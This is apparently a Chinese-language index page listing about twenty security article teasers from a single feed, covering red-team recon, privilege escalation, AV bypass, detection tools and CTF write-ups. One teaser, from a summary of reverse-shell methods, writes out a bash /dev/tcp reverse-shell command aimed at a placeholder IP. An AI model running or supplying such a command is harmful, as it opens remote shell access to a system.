2022年的网络安全方向, 你选对了吗? 个人命运往往与时代脉搏紧密关联。比如2022年如果你选择网络安全行业，那么投入同样的时间精力，就可以享受到政策红利，“升职加薪”几率大大增加。目前我国网络安全人才供需极其不平... 2022-7-21 08:3:7 | 阅读: 13 | 收藏 | LemonSec 安全 网络 漏洞 攻防

如何配置防火墙之防火墙的初始配置 前言本文档是初识防火墙的引路者，阅读本文后您将对防火墙配置过程有了初步认识，并完成防火墙基本配置。01     防火墙的初始配置1.1 设备出厂配置防火墙设备出厂配置如下表。... 2022-7-20 00:0:43 | 阅读: 13 | 收藏 | LemonSec 防火墙 安全 向导 dhcp

业务漏洞挖掘笔记 多年的实战业务漏洞挖掘经验，为了让今后的业务漏洞挖掘工作更清晰，以及尽可能的把重复性的工作自动化、半自动化，所以花费很大精力做了这个笔记。具体操作流程:得到测试目标-目标资产... 2022-7-20 00:0:40 | 阅读: 24 | 收藏 | LemonSec 漏洞 信息 数据 注入 数据库

实战|记一次有趣的溯源 作者：Kat，转载于先知社区。原文地址：https://xz.aliyun.com/t/11275在某次攻防演练信息收集的过程中，偶然发现伪装Github信息泄漏进而钓鱼红队... 2022-7-20 00:0:37 | 阅读: 8 | 收藏 | LemonSec ctypes shellcode 信息 溯源 windll

35 个非常实用的 Shell 拿来就用脚本实例！ 作为一名 Linux 工程师，会写好的脚本不仅能提高工作效率，还能有更多的时间做自己的事。最近在网上冲浪的时候，也注意收集一些大佬写过的脚本，汇总整理一下，欢迎收藏，与君共勉... 2022-7-19 00:2:54 | 阅读: 32 | 收藏 | LemonSec 脚本 num1 num2 num3 wenmin

绕过数字杀软的PowerShell调用并Bypass计划任务 转自红队攻防参考原作者视频https://www.bilibili.com/video/BV1Mq4y1v7WC?spm_id_from=333.999.0.0前言:Powe... 2022-7-19 00:2:48 | 阅读: 108 | 收藏 | LemonSec powershell 拦截 渗透 上线 漏洞

内网信息收集常用命令【文末抽书】 windows系统相关#查看系统信息systeminfo /all#查看系统架构echo %PROCESSOR_ARCHITECTURE%#机器名hostname#查看操作系... 2022-7-19 00:2:45 | 阅读: 33 | 收藏 | LemonSec 信息 网络 安全

另类SRC文件上传漏洞挖掘思路 文档上传引发的XXE漏洞（下图来自于 getshell1993）具体原理原文：浅谈一种特殊格式的xxe作者：你回来吗原文地址：https://xz.aliyun.com/t/... 2022-7-18 00:5:2 | 阅读: 32 | 收藏 | LemonSec 漏洞 xlink 渗透 libreoffice ole

红队信息收集到打点 最近想总结一下，在红队渗透拿到一个目标名或者刷src时候，怎么快速信息收集和批量检测来打到一个点，往往在实际项目中就是拼手速。信息收集到打点大致我就分为企业信息结构收集敏感信... 2022-7-18 00:4:59 | 阅读: 23 | 收藏 | LemonSec 信息 github 爆破 反查 数据

干货｜网络安全资料库 这是一个网安人的聚集地～为解决大多粉丝的提问，以及资源需求，特此联合几位师傅创办了知识星球；知识星球已经运营一年多，内容大致为：（1）每日分享资料与工具，并进行了分类（2）创... 2022-7-18 00:4:56 | 阅读: 13 | 收藏 | LemonSec 给与 星主 模块 创办 合伙

SRC威胁情报挖掘 作者：lan3et ，转载于先知社区原文地址：https://xz.aliyun.com/t/11119什么是威胁情报src会收取什么样的漏洞情报如何挖掘漏洞情报几个src提... 2022-7-17 00:3:26 | 阅读: 14 | 收藏 | LemonSec 漏洞 数据 威胁 盗版 挖掘

渗透测试之windows系统提权总结 转自：乌雲安全起因，由于前几天拿了一个菠菜站的webshell，但是只有iis权限，执行无法创建用户等操作，更无法对整个服务器进行控制了，于是此时便需要提权了，对于一个刚刚入... 2022-7-17 00:3:23 | 阅读: 28 | 收藏 | LemonSec 端口 v01cano 数据 数据库 大马

NoAgent内存马检测 内存马是国内目前比较流行的web层权限维持方式，研究文章也特别多。本人阅读了rebeyond师傅的Java 内存攻击技术漫谈后，尝试利用其中的技术开发用于内存马检测的工具。检... 2022-7-16 00:5:12 | 阅读: 8 | 收藏 | LemonSec jplisagent instrument putlong jvmtienv

攻击者溯源反制思路 作者：SuperDolby高清版下载地址：https://github.com/SuperDolby/hw-侵权请私聊公众号删文 热文推荐  蓝队应急响应姿势之Linux通过... 2022-7-16 00:5:9 | 阅读: 11 | 收藏 | LemonSec 渗透 漏洞 superdolby 免杀 集结

信息安全行业入门与各类技术简介（扫盲贴） 作为第一篇介绍信息安全的扫盲贴，就说一些干货要实际一些，主要介绍一下信息安全行业里面的一些业务开展情况与常规的一些技术手段与工具，附带推荐了一些学习的网站与书籍，纯手码字部分... 2022-7-16 00:5:4 | 阅读: 19 | 收藏 | LemonSec 漏洞 安全 攻击 信息 渗透

『CTF』从两道题目看 RSA 算法 作者：Jgk01 ； 宸极实验室介绍：早年两道RSA题目，考古发现比较有意思，大家感兴趣的可以先不看解题思路自己做一下，比较友好。0x00 前言RSA在平常比赛会经常遇到，之... 2022-7-15 00:1:9 | 阅读: 12 | 收藏 | LemonSec 加密 phi stegb64 equalnum 解题

记一次前端安全测试 文章来源：先知社区（Ainrm）原文地址：https://xz.aliyun.com/t/108010x01 前言遇到一个传输过程数据被加密的网站，无法重放改包，前端也做了较... 2022-7-15 00:1:6 | 阅读: 9 | 收藏 | LemonSec 加密 数据 安全 漏洞 泄漏

对事件响应和实时取证的PowerShell脚本 用于帮助实时取证和事件响应的 POWERSHELL 脚本___________ .__ __ \_ _____/__________ _... 2022-7-14 00:2:8 | 阅读: 16 | 收藏 | LemonSec orensicator log4j 勒索 evtx 脚本

常用反弹shell方法总结 0x01 bash反弹shellbash -i >&/dev/tcp/1.1.1.1/9999 0>&1解释：bash -i [interface] 表示启动shell窗口>... 2022-7-14 00:2:4 | 阅读: 19 | 收藏 | LemonSec 攻击 fileno 攻击机 powercat dup2

防守反制--爆破CS Teamserver 密码 文章来源 ：洛米唯熊0x00:简介#Cobalt strike(下面简称 CS)#众所周知,CS是一个以MSF为基础的GUI框架式“多人运动”渗透测试工具，集成了端口转发、服... 2022-7-13 00:2:57 | 阅读: 36 | 收藏 | LemonSec teamserver 渗透 cobalt passwords